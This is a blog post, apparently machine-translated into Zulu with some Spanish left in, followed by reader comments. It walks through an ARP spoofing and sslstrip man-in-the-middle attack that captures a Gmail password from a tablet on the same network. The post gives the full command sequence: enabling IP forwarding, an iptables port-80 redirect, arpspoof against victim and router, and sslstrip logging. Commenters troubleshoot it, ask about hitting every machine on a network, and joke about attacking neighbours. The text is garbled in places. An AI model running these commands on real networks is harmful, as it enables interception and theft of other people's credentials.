Sawubona ama-Blogger.
Okwanamuhla nginesampula esincane sokuthi kungaba yingozi kangakanani ukuxhuma kunoma iyiphi inethiwekhi ngaphandle kokuphepha kwalabo abaningi bethu abathandayo.
Okwanamuhla, ngizosebenzisa i-ArpSpoofing nge-Sslstrip ukuthola iphasiwedi ye-Gmail. Ukwenza imvelo ilawulwe ngokwengeziwe, ngidale i-akhawunti ebizwa ngokuthi "testarp@gmail.com".
Futhi njengoba ngingazithandi kakhulu izethulo, ake siqale ibhizinisi.
IMVELO
Kulolu vivinyo esinakho okulandelayo:
1. Umhlaseli: Yikhompyutha yami yedeskithophu noma yedeskithophu eneDebian Wheezy. Kusuka ezinqolobaneni ongazifaka sslstrip y donsa ukuthola ukuthola ukube
2. Isisulu: Isisulu yithebhulethi ye-Android efuna ukubona kuphela imeyili yakhe ngesiphequluli.
3. Isiphakathi: Umaphakathi owami ICisco DPC2425 Umzila
AMAKHAYA.
Ikheli lomhlaseli: 172.26.0.2
Ikheli Lomzila: 172.26.0.1
Ikheli Lesisulu: 172.26.0.8
UKUHLASELWA:
Into yokuqala esizoyenza kulokhu kuhlasela ukusebenzisa i-forward ukuze i-computer yethu ikwazi ukudlulisela imininingwane kulowo ohlukunyezwayo ngaphandle kokubona. (Ngaphandle kwalokho kungaba ukuphika ukuhlaselwa kwezinsizakalo)
Ngalokho sizosebenzisa:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Ngakho-ke sikuthola kanjani esikufunayo?
Ake siqale ngokufaka imeyili yethu kwi-Tablet. Ngenkathi singena ngemvume, siyabona ukuthi izinkulungwane nezinkulungwane zezinto zivela kukhonsoli yethu.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
nge-Control + W sifuna okuthile okubizwa ngokuthi yi-SECURE POST.
Futhi sizobona into enjengale.
Phakathi kwalolo layini omkhulu ongabonakali yi-imeyili nephasiwedi yesisulu.
Ngakho-ke sigijimela kwesokudla size ekugcineni sibone ukukhanya ekugcineni komhubhe.
Kwesinye isenzakalo sizobona ukuthi singazivikela kanjani kancane kulokhu kuhlaselwa.
Phendula ngokucaphuna
Ngithatha leli thuba ukusho ukuthi ngenkathi kushicilelwa okuthunyelwe, imiyalo ibingalungile.
Umyalo we-iptables ekugcineni ulahlekile i-8080 ekolunye ulayini. Futhi-ke imiyalo ye-arpspoof yonke yayikulayini ofanayo. Umyalo ngamunye uba kulayini ohlukile.
Ngiyethemba umhleli uyayibona futhi angayilungisa.
Ukubingelela
Ngenze izilungiso ozishoyo, ngabe kulungile?
Uma uzofaka ikhodi kokufakwayo okuncamelayo, sebenzisa ukubuka kwe-HTML, bese uqinisekisa ukuthi i-athikili iyiqiniso ngaphambi kokuyithumela kusalindwe. Ngiyabonga.
Kuyasithokozisa ukwazi ukuthi thina esingenalo ulwazi sisengozini enkulu. Ulwazi oluhle kakhulu noma ngabe ngiqonda okuncane ngesihloko ngiyabona ukubaluleka. Ngiyabonga!
Phendula ngokucaphuna
Kepha lokho kusebenza kuphela uma umhlaseli nesisulu bakunethiwekhi efanayo. Kunoma ikuphi, kubonakala kimi ukuthi uma (uku kwinethiwekhi efanayo) uxhuma usebenzisa i-HTTPS lokho akwenzeki ngoba idatha ibethelwe NGAPHAMBI kokushiya umshini wakho. Uma uxhuma nge-HTTP (ngaphandle kwe-S) ngicabanga ukuthi noma ubheka ikhebula lenethiwekhi ubona okhiye.
Akulona iqiniso. Ngigenca iphasiwedi ye-gmail futhi uma ubona ukuthi i-gmail isebenzisa i-https. Ngakho? Iqiniso ukuthi yize i-https iphephile, kuya nge-http. Ngakho-ke akuphephile kangako.
Ungavumi kangako nge-https ukuthi i-S akuyona eye-Superman yenzelwe "ukuphepha"
isebenza nge-https noma ngaphandle kwe-https, ngiyizamile nge-linux distro ekhethekile futhi isebenza ngaphandle kwezinkinga
Ungayisebenzisa ngokunembile ukufundisa isifundo kulabo abeba i-Wi-Fi yakho. 😀
Kucishe kufane nalokhu abakusho kudala kubhulogi likaChema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, kuhle! / Bese betshela i-paranoid yami njalo lapho ngisebenzisa i-VPN lapho beyobheka i-akhawunti yasebhange…). By the way, kufanele ubone ukuthi abantu abanamahloni banjani kumazwana ... uma ekugcineni entshontsha ...
Manje sidinga ukuthatha okokufundisa kokuthi ungadala kanjani futhi unikele ngesevisi yakho ye-VPN.
Indaba oyixhumanisayo ithakazelisa kakhulu, ibukeka ifanelekile njengencwadi yoveli, futhi lokhu kungenza ngikhumbule lapho ngisebenzisa i-intanethi yomakhelwane bami futhi noma ngithi ngiyayazi le ndaba, ngicabanga ukuthi angikaze ngibubone ubukhulu beqiniso ingozi ebengingagcina ngayo, ngenhlanhla kimi, bavele bashintsha iphasiwedi baba yi-WPA2 nokuyilapho indaba yami ne-ISP yaqala khona haha
Kungakho isihloko sithi Sslstrip isebenza.
Kuyasebenza, inqobo nje uma umhlaseli ephakathi
Ngiliphi igagasi osebenza kulo e-prism? -.-
akukho.
Ngabe ulindeni ukuthumela isicelo sakho XD
imikhonzo
okuthunyelwe okuhle
Kuyathakazelisa ukuthi ngizokwenza isivivinyo semfundo ngokuhamba kwesikhathi ... Mhlawumbe ngingasusa nephasiwedi ku-WiFi bese ngizijabulisa kancane 😛
Nganoma yiliphi ithuba, ingabe ungenza into efanayo ukuthumela amakhasi ahlukile kulawo okubhekiswe kuwo? Isibonelo, bafuna ukuvula i-Facebook bese ngibaqondisa kabusha ku-Google? 😛
Yebo. Kepha konke kungumbhalo ohluke kakhulu.
Mhlawumbe ngizothumela kamuva.
okuthunyelwe okuhle kakhulu, lezi zihloko zifundisa kakhulu, manje kudingeka sikwazi ukumelana nalokhu kuhlaselwa, ngoba abanye (njengami) baxhuma kumanethiwekhi omphakathi (eyunivesithi ngokwesibonelo) kungasiza ukukugwema.
Ukubingelela!
Akungisebenzelanga 🙁
Okuthile kungihluleka lapha, ngaphandle kokuthi ukuxhumana kwe-https kubethelwe ngesitifiketi seseva (uma nje unesitifiketi emshinini wakho, isiphequluli sakho siphethe ukubethela) ngamathebula owaqondisa kabusha i-port 80 (http), hhayi i-443 okuyi-https
Nami bengikucabanga lokho. Iqiniso ukuthi yize i-https "ivikelekile" ngeshwa incike ku-http. Ngakho-ke i-sslstrip isebenzisa lokho, yenza isiphequluli sikholwe ukuthi sisebenzisa ubuqiniso be-https kepha akunjalo.
umoya ongcwele! kepha isiphequluli kufanele sibone isexwayiso esifana nokuthi "lesi sitifiketi sivela kusayithi elisolisayo noma into enjalo" ... nakanjani kuzofanele ngenze izivivinyo XD
Cha, akukho lutho oluphumayo.
Ekugcineni kungisebenzele
Ngixhunywe kwinethiwekhi ye-WEP ngephasiwedi, futhi yangikhombisa iphasiwedi ngqo noma kunjalo.
Umbuzo. Ungayenza le nqubo efanayo kodwa kuwo wonke amakhompyutha axhunywe kwinethiwekhi, esikhundleni sokuba nesisulu esisodwa?
Yebo ungakwenza. Kepha angizange ngenze izivivinyo. Zizame wena bese usitshela ukuthi uqhuba kanjani.
Ukuphela kwento engiyitholayo ngalokhu ukuthi umshini wesisulu uya kokungaxhunyiwe ku-inthanethi, kepha i-sslstrip ayingibonisi lutho: /
Udinga ukukhubaza i-firewall okwesikhashana. Noma okungenani vumela ukuxhumana okungenayo.
Mina noProbe bengibona kuphela igama lomsebenzisi ne-password yekhasi le-facebook, ku-gmail angizange ngithole miphumela ku-log, futhi bengidinga kuphela umugqa we-arpspoof «arpspoof -i -t«. Ngakolunye uhlangothi, umshini wesisulu awukwazanga ukuvula amanye amakhasi. Ngizoqhubeka nokuphenya, kuyajabulisa kakhulu. Usizo kulabo abasebenzisa iManjaro, amaphakheji azofakwa yilezi: dsniff (nansi i-arpspoff), i-twisted ne-python2-pyopenssl. I-Sslstrip ingalandwa kusuka lapha: http://www.thoughtcrime.org/software/sslstrip/
Ukuyisebenzisa $ python2 sslstrip.py
Ukubingelela
Ayiphumanga kepha ulayini we-arpspoof uthi: #arpspoof -i int -t ip-victim ip-router
bheka ngenza khona kanye okushoyo:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PRREOUTING -p tcp –destination-port 80 -j REDIRECT-to-ports 8080
i-arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
i-arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Inkinga ukuthi isisulu, esingenye i-pc enginayo lapha egumbini lami, isele ngaphandle kokuxhumeka kuze kufike ezingeni lokuthi kufanele ngiqale kabusha i-router, yini engingayenza, ngisize.
Enye into engisebenza ngayo nomshini obonakalayo, futhi lapho ngenza umyalo we-iwconfig, i-wlan0 ayiveli, futhi lapho ngenza i-ifconfig, noma kunjalo uma ngine-intanethi emshinini wami we-virtual yini ene-interface ye-eth0.